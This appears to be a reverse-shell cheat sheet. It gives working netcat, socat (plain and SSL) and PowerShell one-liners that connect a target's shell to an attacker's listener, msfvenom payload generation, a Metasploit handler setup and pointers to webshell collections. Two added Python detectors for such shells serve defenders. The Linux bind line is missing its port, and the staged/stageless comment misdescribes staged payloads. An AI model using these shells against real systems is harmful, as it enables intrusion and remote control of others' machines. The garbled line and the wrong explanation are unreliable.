netcat reverse shell

```
nc -lvnp 9999                                                                   # attacker: listen
mkfifo /tmp/f; nc 192.168.1.2 9999 < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f   # target
# once the listener has a connection, upgrade the shell to a full tty:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# press Ctrl+Z to suspend the shell, then on the attacker side:
stty raw -echo; fg
```

## socat

socat reverse shell

```
socat TCP-L:9999 -                                        # attacker: listen
socat TCP:192.168.1.2:9999 EXEC:powershell.exe,pipes      # Windows target: run a shell
socat TCP:192.168.1.2:9999 EXEC:"bash -li"                # Linux target
```

socat SSL-encrypted reverse shell

```
openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
cat shell.key shell.crt > shell.pem
socat OPENSSL-LISTEN:53,cert=shell.pem,verify=0 -         # attacker: listen on port 53
socat OPENSSL:192.168.1.2:53,verify=0 EXEC:/bin/bash      # Linux target: run a shell
```
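For the defender's side of the netcat and socat variants above, here is an added Python example (not from the original notes) that looks for the process-level traces these shells leave on a Linux host: a shell whose standard descriptors are sockets (the `socat ... EXEC:/bin/bash` case, since socat wires the child to a socketpair by default) and a shell whose stdin pipe is written by nc (the mkfifo pipeline). The `Proc` record, the constructed `SAMPLE` process table and the helper names are my own; `read_procs` is what you would run on a live host.

```python
"""Heuristic detector for interactive reverse shells on Linux.

Added example, not part of the original notes. It checks two traces:
  1. a shell (sh/bash/...) whose stdin, stdout or stderr is a socket, which is
     what `socat TCP:... EXEC:/bin/bash` leaves behind (socat connects the
     child to a socketpair unless `pipes` or `pty` is requested);
  2. a shell whose stdin is a pipe written to by nc/ncat/socat, which is the
     `nc host port < /tmp/f | /bin/sh > /tmp/f` pipeline from the notes.
`read_procs` walks /proc on a live Linux host; `find_reverse_shells` works on
plain records so the logic can be exercised offline with constructed data.
"""
import os
from dataclasses import dataclass, field

SHELLS = {"sh", "bash", "dash", "zsh", "ash", "ksh"}
NET_TOOLS = {"nc", "ncat", "netcat", "socat"}


@dataclass
class Proc:
    pid: int
    ppid: int
    comm: str                                    # process name as in /proc/<pid>/stat
    std_fds: dict = field(default_factory=dict)  # fd 0/1/2 -> readlink target


def read_procs():
    """Collect (pid, ppid, comm, std fd targets) for every process in /proc."""
    procs = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/stat") as f:
                stat = f.read()
            # comm is parenthesised and may contain spaces; the fields after it
            # are "state ppid ...", so ppid is the second token after ')'
            comm = stat[stat.index("(") + 1:stat.rindex(")")]
            ppid = int(stat[stat.rindex(")") + 1:].split()[1])
            fds = {}
            for fd in (0, 1, 2):
                try:
                    fds[fd] = os.readlink(f"/proc/{pid}/fd/{fd}")
                except OSError:
                    pass  # fd closed, or the process is not ours to inspect
            procs.append(Proc(pid, ppid, comm, fds))
        except (OSError, ValueError):
            continue  # process exited while we were reading it
    return procs


def find_reverse_shells(procs):
    """Return {pid: [reasons]} for shells that look socket- or nc-driven."""
    # pipe id -> names of the processes whose stdout/stderr feed that pipe
    pipe_writers = {}
    for p in procs:
        for fd in (1, 2):
            target = p.std_fds.get(fd, "")
            if target.startswith("pipe:"):
                pipe_writers.setdefault(target, set()).add(p.comm)

    hits = {}
    for p in procs:
        if p.comm not in SHELLS:
            continue
        targets = [p.std_fds.get(fd, "") for fd in (0, 1, 2)]
        reasons = []
        # "socket:[N]" covers both a TCP socket and the unix socketpair socat
        # uses; resolve N against /proc/net/tcp if you need to tell them apart.
        if any(t.startswith("socket:") for t in targets):
            reasons.append("stdin/stdout/stderr bound to a socket")
        feeders = pipe_writers.get(targets[0], set()) & NET_TOOLS
        if feeders:
            reasons.append("stdin is a pipe written by " + ", ".join(sorted(feeders)))
        if reasons:
            hits[p.pid] = reasons
    return hits


# Constructed process table: one normal ssh login shell, one socat-spawned
# shell, and one mkfifo/nc pipeline. Pids, inode numbers and pty names are
# made up for the example.
SAMPLE = [
    Proc(1, 0, "systemd", {0: "/dev/null", 1: "/dev/null", 2: "/dev/null"}),
    Proc(200, 1, "sshd", {0: "/dev/null", 1: "/dev/null", 2: "/dev/null"}),
    Proc(210, 200, "bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    Proc(300, 210, "socat", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    Proc(301, 300, "bash", {0: "socket:[41001]", 1: "socket:[41001]", 2: "socket:[41001]"}),
    Proc(400, 210, "nc", {0: "/tmp/f", 1: "pipe:[52002]", 2: "/dev/pts/0"}),
    Proc(401, 210, "sh", {0: "pipe:[52002]", 1: "/tmp/f", 2: "/tmp/f"}),
]


if __name__ == "__main__":
    procs = read_procs() if os.path.isdir("/proc") else SAMPLE
    for pid, reasons in sorted(find_reverse_shells(procs).items()):
        print(f"pid {pid}: " + "; ".join(reasons))
```

Run it as root for a full view, since `/proc/<pid>/fd` of other users' processes is not readable otherwise. The socket check is the more robust of the two: the pipe check depends on the shell and the network tool being alive at the same time and on the tool keeping its well-known name, so a renamed binary slips past it.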

Common payloads

Linux

```
mkfifo /tmp/f; nc -lvnp  < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f   # bind variant: nc listens for the incoming connection
```

Windows

```
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
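On the detection side, the PowerShell one-liner above is noisy: the whole TCPClient/GetStream/iex body ends up in the process command line, so it is visible to anyone collecting process-creation events with command-line auditing enabled. The following Python is an added example (not from the original page) that scores such command lines from a constructed, tab-separated process-creation log; the indicator weights, the threshold and the `SAMPLE_LOG` records are my own choices and not a vendor rule.

```python
"""Score PowerShell launch command lines for the TCPClient reverse-shell
pattern shown above.

Added example, not from the original page. Input is a constructed,
tab-separated process-creation log (timestamp, host, user, command line),
the shape you get from Windows event 4688 or a Sysmon process-create event
once command-line auditing is turned on. Weights and threshold are my own
choices; tune them against your own baseline.
"""
import re

# name -> (weight, pattern). Launcher flags alone are weak signals; socket and
# stream calls inside a one-liner are strong ones.
INDICATORS = {
    "no_profile":        (1, re.compile(r"-(?:nop|noprofile)\b", re.I)),
    "hidden_window":     (2, re.compile(r"-(?:w|windowstyle)\s+hidden\b", re.I)),
    "encoded_command":   (2, re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}", re.I)),
    "invoke_expression": (2, re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    "tcp_client":        (3, re.compile(r"system\.net\.sockets\.tcpclient", re.I)),
    "stream_io":         (3, re.compile(r"\.getstream\(\)", re.I)),
}
THRESHOLD = 4  # one strong indicator plus anything else, or two medium ones


def score_command_line(cmd):
    """Return (score, [indicator names]) for one command line."""
    hits = [name for name, (_, rx) in INDICATORS.items() if rx.search(cmd)]
    return sum(INDICATORS[name][0] for name in hits), hits


def scan_log(lines):
    """Return findings for records whose command line scores >= THRESHOLD."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        parts = line.rstrip("\r\n").split("\t", 3)
        if len(parts) != 4:
            continue  # malformed record: skip it rather than abort the scan
        timestamp, host, user, cmd = parts
        score, hits = score_command_line(cmd)
        if score >= THRESHOLD:
            findings.append({"line": lineno, "time": timestamp, "host": host,
                             "user": user, "score": score, "hits": hits})
    return findings


# Constructed log: a harmless -nop one-liner, a scheduled script, the
# TCPClient reverse shell (body abbreviated with ...), and a hidden encoded
# launch whose base64 blob is a made-up placeholder.
SAMPLE_LOG = [
    "2021-09-12T10:15:03Z\tWS01\talice\tpowershell.exe -nop -c \"Get-Date\"",
    "2021-09-12T10:16:41Z\tWS01\tsvc_backup\tpowershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "2021-09-12T10:17:09Z\tWS02\tbob\tpowershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();...;$sendback = (iex $data 2>&1 | Out-String);...\"",
    "2021-09-12T10:18:22Z\tWS03\tcarol\tpowershell.exe -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQA=",
    "this record has no tab separators and is skipped",
]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} {f['host']}/{f['user']} score={f['score']} hits={','.join(f['hits'])}")
```

The `-enc` record is flagged on launcher flags alone, so a production version should base64-decode the blob (UTF-16LE) and rescore the decoded text with the same indicators, since the socket calls are hidden inside it rather than in the visible command line.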

Payload collection on GitHub

[PayloadsAllTheThings: Reverse Shell Cheatsheet (swisskyrepo, GitHub)](https://github.com/swisskyrepo/PayloadsAllTheThings)

msfvenom payload generation

```
msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=192.168.1.2 LPORT=9999

# a "/" before the last name component (shell/reverse_tcp) marks a staged payload,
# a "_" (shell_reverse_tcp) marks a stageless one
# staged payloads: the shell is hidden inside a normal-looking program and is not easy to spot
# stageless payloads: the payload runs directly and is easier to detect
```

Metasploit multi/handler (listener for the generated payload)

```
msfconsole
use multi/handler
set PAYLOAD windows/x64/shell/reverse_tcp
set LHOST 192.168.1.2
set LPORT 9999
exploit -j
```

WebShells

  • Kali ships a collection of webshells in /usr/share/webshells
Last modified: 12 September 2021